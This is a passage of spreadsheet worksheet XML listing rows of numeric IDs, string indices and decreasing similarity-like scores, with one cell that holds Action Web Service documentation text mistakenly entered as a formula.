      <c r="E5414" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5414" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="5415" ht="15.75" customHeight="1">
      <c r="A5415" s="1">
        <v>22309.0</v>
      </c>
      <c r="B5415" s="2">
        <v>3.3792727E7</v>
      </c>
      <c r="C5415" s="2" t="s">
        <v>5171</v>
      </c>
      <c r="D5415" s="2">
        <v>1.0</v>
      </c>
      <c r="E5415" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5415" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="5416" ht="15.75" customHeight="1">
      <c r="A5416" s="1">
        <v>23107.0</v>
      </c>
      <c r="B5416" s="2">
        <v>5102243.0</v>
      </c>
      <c r="C5416" s="2" t="s">
        <v>5172</v>
      </c>
      <c r="D5416" s="2">
        <v>1.0</v>
      </c>
      <c r="E5416" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5416" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="5417" ht="15.75" customHeight="1">
      <c r="A5417" s="1">
        <v>23459.0</v>
      </c>
      <c r="B5417" s="2">
        <v>5697253.0</v>
      </c>
      <c r="C5417" s="2" t="s">
        <v>5173</v>
      </c>
      <c r="D5417" s="2">
        <v>1.0</v>
      </c>
      <c r="E5417" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5417" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="5418" ht="15.75" customHeight="1">
      <c r="A5418" s="1">
        <v>23525.0</v>
      </c>
      <c r="B5418" s="2">
        <v>5874994.0</v>
      </c>
      <c r="C5418" s="2" t="s">
        <v>5174</v>
      </c>
      <c r="D5418" s="2">
        <v>1.0</v>
      </c>
      <c r="E5418" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5418" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="5419" ht="15.75" customHeight="1">
      <c r="A5419" s="1">
        <v>23589.0</v>
      </c>
      <c r="B5419" s="2">
        <v>6326287.0</v>
      </c>
      <c r="C5419" s="2" t="s">
        <v>5175</v>
      </c>
      <c r="D5419" s="2">
        <v>1.0</v>
      </c>
      <c r="E5419" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5419" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="5420" ht="15.75" customHeight="1">
      <c r="A5420" s="1">
        <v>24615.0</v>
      </c>
      <c r="B5420" s="2">
        <v>1.1442996E7</v>
      </c>
      <c r="C5420" s="2" t="s">
        <v>5176</v>
      </c>
      <c r="D5420" s="2">
        <v>1.0</v>
      </c>
      <c r="E5420" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5420" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="5421" ht="15.75" customHeight="1">
      <c r="A5421" s="1">
        <v>26608.0</v>
      </c>
      <c r="B5421" s="2">
        <v>1.8011618E7</v>
      </c>
      <c r="C5421" s="2" t="s">
        <v>5177</v>
      </c>
      <c r="D5421" s="2">
        <v>1.0</v>
      </c>
      <c r="E5421" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5421" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="5422" ht="15.75" customHeight="1">
      <c r="A5422" s="1">
        <v>28469.0</v>
      </c>
      <c r="B5422" s="2">
        <v>2.6615476E7</v>
      </c>
      <c r="C5422" s="2" t="s">
        <v>5178</v>
      </c>
      <c r="D5422" s="2">
        <v>1.0</v>
      </c>
      <c r="E5422" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5422" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="5423" ht="15.75" customHeight="1">
      <c r="A5423" s="1">
        <v>30798.0</v>
      </c>
      <c r="B5423" s="2">
        <v>4.5216853E7</v>
      </c>
      <c r="C5423" s="2" t="s">
        <v>5179</v>
      </c>
      <c r="D5423" s="2">
        <v>1.0</v>
      </c>
      <c r="E5423" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5423" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="5424" ht="15.75" customHeight="1">
      <c r="A5424" s="1">
        <v>32461.0</v>
      </c>
      <c r="B5424" s="2">
        <v>5677597.0</v>
      </c>
      <c r="C5424" s="2" t="s">
        <v>5180</v>
      </c>
      <c r="D5424" s="2">
        <v>1.0</v>
      </c>
      <c r="E5424" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5424" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="5425" ht="15.75" customHeight="1">
      <c r="A5425" s="1">
        <v>29487.0</v>
      </c>
      <c r="B5425" s="2">
        <v>3.2525531E7</v>
      </c>
      <c r="C5425" s="2" t="s">
        <v>5181</v>
      </c>
      <c r="D5425" s="2">
        <v>1.0</v>
      </c>
      <c r="E5425" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5425" s="2">
        <v>0.1577777777777778</v>
      </c>
    </row>
    <row r="5426" ht="15.75" customHeight="1">
      <c r="A5426" s="1">
        <v>24998.0</v>
      </c>
      <c r="B5426" s="2">
        <v>1.2690786E7</v>
      </c>
      <c r="C5426" s="2" t="s">
        <v>5182</v>
      </c>
      <c r="D5426" s="2">
        <v>1.0</v>
      </c>
      <c r="E5426" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5426" s="2">
        <v>0.1576388888888889</v>
      </c>
    </row>
    <row r="5427" ht="15.75" customHeight="1">
      <c r="A5427" s="1">
        <v>25370.0</v>
      </c>
      <c r="B5427" s="2">
        <v>1.3605356E7</v>
      </c>
      <c r="C5427" s="2" t="s">
        <v>5183</v>
      </c>
      <c r="D5427" s="2">
        <v>1.0</v>
      </c>
      <c r="E5427" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5427" s="2">
        <v>0.1575342465753425</v>
      </c>
    </row>
    <row r="5428" ht="15.75" customHeight="1">
      <c r="A5428" s="1">
        <v>29433.0</v>
      </c>
      <c r="B5428" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C5428" s="2" t="s">
        <v>5184</v>
      </c>
      <c r="D5428" s="2">
        <v>1.0</v>
      </c>
      <c r="E5428" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5428" s="2">
        <v>0.1572504708097929</v>
      </c>
    </row>
    <row r="5429" ht="15.75" customHeight="1">
      <c r="A5429" s="1">
        <v>21278.0</v>
      </c>
      <c r="B5429" s="2">
        <v>2.028705E7</v>
      </c>
      <c r="C5429" s="2" t="s">
        <v>5185</v>
      </c>
      <c r="D5429" s="2">
        <v>1.0</v>
      </c>
      <c r="E5429" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5429" s="2">
        <v>0.1569200779727096</v>
      </c>
    </row>
    <row r="5430" ht="15.75" customHeight="1">
      <c r="A5430" s="1">
        <v>27538.0</v>
      </c>
      <c r="B5430" s="2">
        <v>2.221668E7</v>
      </c>
      <c r="C5430" s="2" t="s">
        <v>5186</v>
      </c>
      <c r="D5430" s="2">
        <v>1.0</v>
      </c>
      <c r="E5430" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5430" s="2">
        <v>0.156810035842294</v>
      </c>
    </row>
    <row r="5431" ht="15.75" customHeight="1">
      <c r="A5431" s="1">
        <v>27119.0</v>
      </c>
      <c r="B5431" s="2">
        <v>2.0660226E7</v>
      </c>
      <c r="C5431" s="2" t="s">
        <v>5186</v>
      </c>
      <c r="D5431" s="2">
        <v>1.0</v>
      </c>
      <c r="E5431" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5431" s="2">
        <v>0.1568100358422939</v>
      </c>
    </row>
    <row r="5432" ht="15.75" customHeight="1">
      <c r="A5432" s="1">
        <v>31452.0</v>
      </c>
      <c r="B5432" s="2">
        <v>5032406.0</v>
      </c>
      <c r="C5432" s="2" t="s">
        <v>5187</v>
      </c>
      <c r="D5432" s="2">
        <v>1.0</v>
      </c>
      <c r="E5432" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5432" s="2">
        <v>0.1568100358422939</v>
      </c>
    </row>
    <row r="5433" ht="15.75" customHeight="1">
      <c r="A5433" s="1">
        <v>31957.0</v>
      </c>
      <c r="B5433" s="2">
        <v>5310109.0</v>
      </c>
      <c r="C5433" s="2" t="s">
        <v>5188</v>
      </c>
      <c r="D5433" s="2">
        <v>1.0</v>
      </c>
      <c r="E5433" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5433" s="2">
        <v>0.1568100358422939</v>
      </c>
    </row>
    <row r="5434" ht="15.75" customHeight="1">
      <c r="A5434" s="1">
        <v>26781.0</v>
      </c>
      <c r="B5434" s="2">
        <v>1.8536828E7</v>
      </c>
      <c r="C5434" s="2" t="s">
        <v>5189</v>
      </c>
      <c r="D5434" s="2">
        <v>1.0</v>
      </c>
      <c r="E5434" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5434" s="2">
        <v>0.1564102564102565</v>
      </c>
    </row>
    <row r="5435" ht="15.75" customHeight="1">
      <c r="A5435" s="1">
        <v>22402.0</v>
      </c>
      <c r="B5435" s="2">
        <v>3.5697312E7</v>
      </c>
      <c r="C5435" s="2" t="s">
        <v>5190</v>
      </c>
      <c r="D5435" s="2">
        <v>1.0</v>
      </c>
      <c r="E5435" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5435" s="2">
        <v>0.1564102564102564</v>
      </c>
    </row>
    <row r="5436" ht="15.75" customHeight="1">
      <c r="A5436" s="1">
        <v>25903.0</v>
      </c>
      <c r="B5436" s="2">
        <v>1.5063413E7</v>
      </c>
      <c r="C5436" s="2" t="s">
        <v>5191</v>
      </c>
      <c r="D5436" s="2">
        <v>1.0</v>
      </c>
      <c r="E5436" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5436" s="2">
        <v>0.1562091503267974</v>
      </c>
    </row>
    <row r="5437" ht="15.75" customHeight="1">
      <c r="A5437" s="1">
        <v>27811.0</v>
      </c>
      <c r="B5437" s="2">
        <v>2.3303604E7</v>
      </c>
      <c r="C5437" s="2" t="s">
        <v>5192</v>
      </c>
      <c r="D5437" s="2">
        <v>1.0</v>
      </c>
      <c r="E5437" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5437" s="2">
        <v>0.1562091503267974</v>
      </c>
    </row>
    <row r="5438" ht="15.75" customHeight="1">
      <c r="A5438" s="1">
        <v>20305.0</v>
      </c>
      <c r="B5438" s="2">
        <v>1.1339694E7</v>
      </c>
      <c r="C5438" s="2" t="s">
        <v>5193</v>
      </c>
      <c r="D5438" s="2">
        <v>1.0</v>
      </c>
      <c r="E5438" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5438" s="2">
        <v>0.1561302681992337</v>
      </c>
    </row>
    <row r="5439" ht="15.75" customHeight="1">
      <c r="A5439" s="1">
        <v>32649.0</v>
      </c>
      <c r="B5439" s="2">
        <v>5874993.0</v>
      </c>
      <c r="C5439" s="2" t="s">
        <v>5174</v>
      </c>
      <c r="D5439" s="2">
        <v>1.0</v>
      </c>
      <c r="E5439" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5439" s="2">
        <v>0.1561302681992337</v>
      </c>
    </row>
    <row r="5440" ht="15.75" customHeight="1">
      <c r="A5440" s="1">
        <v>31698.0</v>
      </c>
      <c r="B5440" s="2">
        <v>5.197084E7</v>
      </c>
      <c r="C5440" s="2" t="s">
        <v>5194</v>
      </c>
      <c r="D5440" s="2">
        <v>1.0</v>
      </c>
      <c r="E5440" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5440" s="2">
        <v>0.1560846560846561</v>
      </c>
    </row>
    <row r="5441" ht="15.75" customHeight="1">
      <c r="A5441" s="1">
        <v>24219.0</v>
      </c>
      <c r="B5441" s="2">
        <v>1.0422571E7</v>
      </c>
      <c r="C5441" s="2" t="s">
        <v>5195</v>
      </c>
      <c r="D5441" s="2">
        <v>1.0</v>
      </c>
      <c r="E5441" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5441" s="2">
        <v>0.1557539682539683</v>
      </c>
    </row>
    <row r="5442" ht="15.75" customHeight="1">
      <c r="A5442" s="1">
        <v>22652.0</v>
      </c>
      <c r="B5442" s="2">
        <v>4.1004442E7</v>
      </c>
      <c r="C5442" s="2" t="s">
        <v>5196</v>
      </c>
      <c r="D5442" s="2">
        <v>1.0</v>
      </c>
      <c r="E5442" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5442" s="2">
        <v>0.1557377049180328</v>
      </c>
    </row>
    <row r="5443" ht="15.75" customHeight="1">
      <c r="A5443" s="1">
        <v>25803.0</v>
      </c>
      <c r="B5443" s="2">
        <v>1.4718206E7</v>
      </c>
      <c r="C5443" s="2" t="s">
        <v>5197</v>
      </c>
      <c r="D5443" s="2">
        <v>1.0</v>
      </c>
      <c r="E5443" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5443" s="2">
        <v>0.1557120500782473</v>
      </c>
    </row>
    <row r="5444" ht="15.75" customHeight="1">
      <c r="A5444" s="1">
        <v>27686.0</v>
      </c>
      <c r="B5444" s="2">
        <v>2.2973575E7</v>
      </c>
      <c r="C5444" s="2" t="s">
        <v>5198</v>
      </c>
      <c r="D5444" s="2">
        <v>1.0</v>
      </c>
      <c r="E5444" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5444" s="2">
        <v>0.1557120500782473</v>
      </c>
    </row>
    <row r="5445" ht="15.75" customHeight="1">
      <c r="A5445" s="1">
        <v>29580.0</v>
      </c>
      <c r="B5445" s="2">
        <v>3.348233E7</v>
      </c>
      <c r="C5445" s="2" t="s">
        <v>5199</v>
      </c>
      <c r="D5445" s="2">
        <v>1.0</v>
      </c>
      <c r="E5445" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5445" s="2">
        <v>0.1557120500782473</v>
      </c>
    </row>
    <row r="5446" ht="15.75" customHeight="1">
      <c r="A5446" s="1">
        <v>25851.0</v>
      </c>
      <c r="B5446" s="2">
        <v>1.4854013E7</v>
      </c>
      <c r="C5446" s="2" t="s">
        <v>5200</v>
      </c>
      <c r="D5446" s="2">
        <v>1.0</v>
      </c>
      <c r="E5446" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5446" s="2">
        <v>0.1556847545219638</v>
      </c>
    </row>
    <row r="5447" ht="15.75" customHeight="1">
      <c r="A5447" s="1">
        <v>31115.0</v>
      </c>
      <c r="B5447" s="2">
        <v>4.872732E7</v>
      </c>
      <c r="C5447" s="2" t="s">
        <v>5201</v>
      </c>
      <c r="D5447" s="2">
        <v>1.0</v>
      </c>
      <c r="E5447" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5447" s="2">
        <v>0.155448717948718</v>
      </c>
    </row>
    <row r="5448" ht="15.75" customHeight="1">
      <c r="A5448" s="1">
        <v>24311.0</v>
      </c>
      <c r="B5448" s="2">
        <v>1.059378E7</v>
      </c>
      <c r="C5448" s="2" t="s">
        <v>5202</v>
      </c>
      <c r="D5448" s="2">
        <v>1.0</v>
      </c>
      <c r="E5448" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5448" s="2">
        <v>0.1553945249597424</v>
      </c>
    </row>
    <row r="5449" ht="15.75" customHeight="1">
      <c r="A5449" s="1">
        <v>28726.0</v>
      </c>
      <c r="B5449" s="2">
        <v>2.7918738E7</v>
      </c>
      <c r="C5449" s="2" t="s">
        <v>5203</v>
      </c>
      <c r="D5449" s="2">
        <v>1.0</v>
      </c>
      <c r="E5449" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5449" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="5450" ht="15.75" customHeight="1">
      <c r="A5450" s="1">
        <v>30437.0</v>
      </c>
      <c r="B5450" s="2">
        <v>3.9096428E7</v>
      </c>
      <c r="C5450" s="2" t="s">
        <v>5204</v>
      </c>
      <c r="D5450" s="2">
        <v>1.0</v>
      </c>
      <c r="E5450" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5450" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="5451" ht="15.75" customHeight="1">
      <c r="A5451" s="1">
        <v>32865.0</v>
      </c>
      <c r="B5451" s="2">
        <v>6295962.0</v>
      </c>
      <c r="C5451" s="2" t="s">
        <v>5205</v>
      </c>
      <c r="D5451" s="2">
        <v>1.0</v>
      </c>
      <c r="E5451" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5451" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="5452" ht="15.75" customHeight="1">
      <c r="A5452" s="1">
        <v>27148.0</v>
      </c>
      <c r="B5452" s="2">
        <v>2.0775019E7</v>
      </c>
      <c r="C5452" s="2" t="s">
        <v>5206</v>
      </c>
      <c r="D5452" s="2">
        <v>1.0</v>
      </c>
      <c r="E5452" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5452" s="2">
        <v>0.1550925925925927</v>
      </c>
    </row>
    <row r="5453" ht="15.75" customHeight="1">
      <c r="A5453" s="1">
        <v>26063.0</v>
      </c>
      <c r="B5453" s="2">
        <v>1.5545201E7</v>
      </c>
      <c r="C5453" s="2" t="s">
        <v>5207</v>
      </c>
      <c r="D5453" s="2">
        <v>1.0</v>
      </c>
      <c r="E5453" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5453" s="2">
        <v>0.1550925925925926</v>
      </c>
    </row>
    <row r="5454" ht="15.75" customHeight="1">
      <c r="A5454" s="1">
        <v>30433.0</v>
      </c>
      <c r="B5454" s="2">
        <v>3.9035169E7</v>
      </c>
      <c r="C5454" s="2" t="s">
        <v>5208</v>
      </c>
      <c r="D5454" s="2">
        <v>1.0</v>
      </c>
      <c r="E5454" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5454" s="2">
        <v>0.1550580431177447</v>
      </c>
    </row>
    <row r="5455" ht="15.75" customHeight="1">
      <c r="A5455" s="1">
        <v>23999.0</v>
      </c>
      <c r="B5455" s="2">
        <v>9236139.0</v>
      </c>
      <c r="C5455" s="2" t="s">
        <v>5160</v>
      </c>
      <c r="D5455" s="2">
        <v>1.0</v>
      </c>
      <c r="E5455" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5455" s="2">
        <v>0.1549707602339182</v>
      </c>
    </row>
    <row r="5456" ht="15.75" customHeight="1">
      <c r="A5456" s="1">
        <v>24734.0</v>
      </c>
      <c r="B5456" s="2">
        <v>1.1773513E7</v>
      </c>
      <c r="C5456" s="2" t="s">
        <v>5209</v>
      </c>
      <c r="D5456" s="2">
        <v>1.0</v>
      </c>
      <c r="E5456" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5456" s="2">
        <v>0.1547008547008547</v>
      </c>
    </row>
    <row r="5457" ht="15.75" customHeight="1">
      <c r="A5457" s="1">
        <v>31922.0</v>
      </c>
      <c r="B5457" s="2">
        <v>5304694.0</v>
      </c>
      <c r="C5457" s="2" t="s">
        <v>5210</v>
      </c>
      <c r="D5457" s="2">
        <v>1.0</v>
      </c>
      <c r="E5457" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5457" s="2">
        <v>0.1547008547008547</v>
      </c>
    </row>
    <row r="5458" ht="15.75" customHeight="1">
      <c r="A5458" s="1">
        <v>24891.0</v>
      </c>
      <c r="B5458" s="2">
        <v>1.2261947E7</v>
      </c>
      <c r="C5458" s="2" t="s">
        <v>5211</v>
      </c>
      <c r="D5458" s="2">
        <v>1.0</v>
      </c>
      <c r="E5458" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5458" s="2">
        <v>0.154320987654321</v>
      </c>
    </row>
    <row r="5459" ht="15.75" customHeight="1">
      <c r="A5459" s="1">
        <v>30754.0</v>
      </c>
      <c r="B5459" s="2">
        <v>4.4173153E7</v>
      </c>
      <c r="C5459" s="2" t="s">
        <v>5212</v>
      </c>
      <c r="D5459" s="2">
        <v>1.0</v>
      </c>
      <c r="E5459" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5459" s="2">
        <v>0.1542145593869732</v>
      </c>
    </row>
    <row r="5460" ht="15.75" customHeight="1">
      <c r="A5460" s="1">
        <v>32738.0</v>
      </c>
      <c r="B5460" s="2">
        <v>6026512.0</v>
      </c>
      <c r="C5460" s="2" t="s">
        <v>5213</v>
      </c>
      <c r="D5460" s="2">
        <v>1.0</v>
      </c>
      <c r="E5460" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5460" s="2">
        <v>0.1542145593869732</v>
      </c>
    </row>
    <row r="5461" ht="15.75" customHeight="1">
      <c r="A5461" s="1">
        <v>24735.0</v>
      </c>
      <c r="B5461" s="2">
        <v>1.1773513E7</v>
      </c>
      <c r="C5461" s="2" t="s">
        <v>5214</v>
      </c>
      <c r="D5461" s="2">
        <v>1.0</v>
      </c>
      <c r="E5461" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5461" s="2">
        <v>0.1541471048513302</v>
      </c>
    </row>
    <row r="5462" ht="15.75" customHeight="1">
      <c r="A5462" s="1">
        <v>33643.0</v>
      </c>
      <c r="B5462" s="2">
        <v>8386755.0</v>
      </c>
      <c r="C5462" s="2" t="s">
        <v>5215</v>
      </c>
      <c r="D5462" s="2">
        <v>1.0</v>
      </c>
      <c r="E5462" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5462" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="5463" ht="15.75" customHeight="1">
      <c r="A5463" s="1">
        <v>28629.0</v>
      </c>
      <c r="B5463" s="2">
        <v>2.7182577E7</v>
      </c>
      <c r="C5463" s="2" t="s">
        <v>5216</v>
      </c>
      <c r="D5463" s="2">
        <v>1.0</v>
      </c>
      <c r="E5463" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5463" s="2">
        <v>0.1539162112932605</v>
      </c>
    </row>
    <row r="5464" ht="15.75" customHeight="1">
      <c r="A5464" s="1">
        <v>27038.0</v>
      </c>
      <c r="B5464" s="2">
        <v>2.0164652E7</v>
      </c>
      <c r="C5464" s="2" t="s">
        <v>5217</v>
      </c>
      <c r="D5464" s="2">
        <v>1.0</v>
      </c>
      <c r="E5464" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5464" s="2">
        <v>0.153903903903904</v>
      </c>
    </row>
    <row r="5465" ht="15.75" customHeight="1">
      <c r="A5465" s="1">
        <v>29482.0</v>
      </c>
      <c r="B5465" s="2">
        <v>3.2453281E7</v>
      </c>
      <c r="C5465" s="2" t="s">
        <v>5218</v>
      </c>
      <c r="D5465" s="2">
        <v>1.0</v>
      </c>
      <c r="E5465" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5465" s="2">
        <v>0.1537698412698413</v>
      </c>
    </row>
    <row r="5466" ht="15.75" customHeight="1">
      <c r="A5466" s="1">
        <v>30763.0</v>
      </c>
      <c r="B5466" s="2">
        <v>4.4359936E7</v>
      </c>
      <c r="C5466" s="2" t="s">
        <v>5219</v>
      </c>
      <c r="D5466" s="2">
        <v>1.0</v>
      </c>
      <c r="E5466" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5466" s="2">
        <v>0.1537698412698413</v>
      </c>
    </row>
    <row r="5467" ht="15.75" customHeight="1">
      <c r="A5467" s="1">
        <v>33975.0</v>
      </c>
      <c r="B5467" s="2">
        <v>9390683.0</v>
      </c>
      <c r="C5467" s="2" t="s">
        <v>5220</v>
      </c>
      <c r="D5467" s="2">
        <v>1.0</v>
      </c>
      <c r="E5467" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5467" s="2">
        <v>0.1536458333333334</v>
      </c>
    </row>
    <row r="5468" ht="15.75" customHeight="1">
      <c r="A5468" s="1">
        <v>29258.0</v>
      </c>
      <c r="B5468" s="2">
        <v>3.0976302E7</v>
      </c>
      <c r="C5468" s="2" t="str">
        <f> Features
SOAP RPC protocol support
Dynamic WSDL generation for APIs
XML-RPC protocol support
Clients that use the same API definitions as the server for
easy interoperability with other Action Web Service based applications
Type signature hints to improve interoperability with static languages
Active Record model class support in signatures
== Defining your APIs
You specify the methods you want to make available as API methods in an
ActionWebService::API::Base derivative, and then specify this API
definition class wherever you want to use that API.</f>
        <v>#ERROR!</v>
      </c>
      <c r="D5468" s="2">
        <v>1.0</v>
      </c>
      <c r="E5468" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5468" s="2">
        <v>0.1535947712418301</v>
      </c>
    </row>
    <row r="5469" ht="15.75" customHeight="1">
      <c r="A5469" s="1">
        <v>29804.0</v>
      </c>
      <c r="B5469" s="2">
        <v>3.5150533E7</v>
      </c>
      <c r="C5469" s="2" t="s">
        <v>5221</v>
      </c>
      <c r="D5469" s="2">
        <v>1.0</v>
      </c>
      <c r="E5469" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5469" s="2">
        <v>0.1535947712418301</v>
      </c>
    </row>
    <row r="5470" ht="15.75" customHeight="1">
      <c r="A5470" s="1">
        <v>21237.0</v>
      </c>
      <c r="B5470" s="2">
        <v>1.9722387E7</v>
      </c>
      <c r="C5470" s="2" t="s">
        <v>5222</v>
      </c>
      <c r="D5470" s="2">
        <v>1.0</v>
      </c>
      <c r="E5470" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5470" s="2">
        <v>0.1534839924670433</v>
      </c>
    </row>
    <row r="5471" ht="15.75" customHeight="1">
      <c r="A5471" s="1">
        <v>25197.0</v>
      </c>
      <c r="B5471" s="2">
        <v>1.3200714E7</v>
      </c>
      <c r="C5471" s="2" t="s">
        <v>5223</v>
      </c>
      <c r="D5471" s="2">
        <v>1.0</v>
      </c>
      <c r="E5471" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5471" s="2">
        <v>0.1534839924670433</v>
      </c>
    </row>
    <row r="5472" ht="15.75" customHeight="1">
      <c r="A5472" s="1">
        <v>28931.0</v>
      </c>
      <c r="B5472" s="2">
        <v>2.9576314E7</v>
      </c>
      <c r="C5472" s="2" t="s">
        <v>5224</v>
      </c>
      <c r="D5472" s="2">
        <v>1.0</v>
      </c>
      <c r="E5472" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5472" s="2">
        <v>0.1534722222222222</v>
      </c>
    </row>
    <row r="5473" ht="15.75" customHeight="1">
      <c r="A5473" s="1">
        <v>20178.0</v>
      </c>
      <c r="B5473" s="2">
        <v>1.0455688E7</v>
      </c>
      <c r="C5473" s="2" t="s">
        <v>5225</v>
      </c>
      <c r="D5473" s="2">
        <v>1.0</v>
      </c>
      <c r="E5473" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5473" s="2">
        <v>0.1533996683250415</v>
      </c>
    </row>
    <row r="5474" ht="15.75" customHeight="1">
      <c r="A5474" s="1">
        <v>29341.0</v>
      </c>
      <c r="B5474" s="2">
        <v>3.138776E7</v>
      </c>
      <c r="C5474" s="2" t="s">
        <v>5208</v>
      </c>
      <c r="D5474" s="2">
        <v>1.0</v>
      </c>
      <c r="E5474" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5474" s="2">
        <v>0.1533996683250415</v>
      </c>
    </row>
    <row r="5475" ht="15.75" customHeight="1">
      <c r="A5475" s="1">
        <v>31650.0</v>
      </c>
      <c r="B5475" s="2">
        <v>5.1591105E7</v>
      </c>
      <c r="C5475" s="2" t="s">
        <v>5226</v>
      </c>
      <c r="D5475" s="2">
        <v>1.0</v>
      </c>
      <c r="E5475" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5475" s="2">
        <v>0.1533996683250415</v>
      </c>
    </row>
    <row r="5476" ht="15.75" customHeight="1">
      <c r="A5476" s="1">
        <v>31454.0</v>
      </c>
      <c r="B5476" s="2">
        <v>5033401.0</v>
      </c>
      <c r="C5476" s="2" t="s">
        <v>5227</v>
      </c>
      <c r="D5476" s="2">
        <v>1.0</v>
      </c>
      <c r="E5476" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5476" s="2">
        <v>0.1530214424951268</v>
      </c>
    </row>
    <row r="5477" ht="15.75" customHeight="1">
      <c r="A5477" s="1">
        <v>31940.0</v>
      </c>
      <c r="B5477" s="2">
        <v>5.3074114E7</v>
      </c>
      <c r="C5477" s="2" t="s">
        <v>5228</v>
      </c>
      <c r="D5477" s="2">
        <v>1.0</v>
      </c>
      <c r="E5477" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5477" s="2">
        <v>0.1530214424951268</v>
      </c>
    </row>
    <row r="5478" ht="15.75" customHeight="1">
      <c r="A5478" s="1">
        <v>22843.0</v>
      </c>
      <c r="B5478" s="2">
        <v>4.6677084E7</v>
      </c>
      <c r="C5478" s="2" t="s">
        <v>5229</v>
      </c>
      <c r="D5478" s="2">
        <v>1.0</v>
      </c>
      <c r="E5478" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5478" s="2">
        <v>0.152991452991453</v>
      </c>
    </row>
    <row r="5479" ht="15.75" customHeight="1">
      <c r="A5479" s="1">
        <v>24520.0</v>
      </c>
      <c r="B5479" s="2">
        <v>1.1162485E7</v>
      </c>
      <c r="C5479" s="2" t="s">
        <v>5230</v>
      </c>
      <c r="D5479" s="2">
        <v>1.0</v>
      </c>
      <c r="E5479" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5479" s="2">
        <v>0.1529680365296804</v>
      </c>
    </row>
    <row r="5480" ht="15.75" customHeight="1">
      <c r="A5480" s="1">
        <v>21055.0</v>
      </c>
      <c r="B5480" s="2">
        <v>1.7781061E7</v>
      </c>
      <c r="C5480" s="2" t="s">
        <v>5231</v>
      </c>
      <c r="D5480" s="2">
        <v>1.0</v>
      </c>
      <c r="E5480" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5480" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
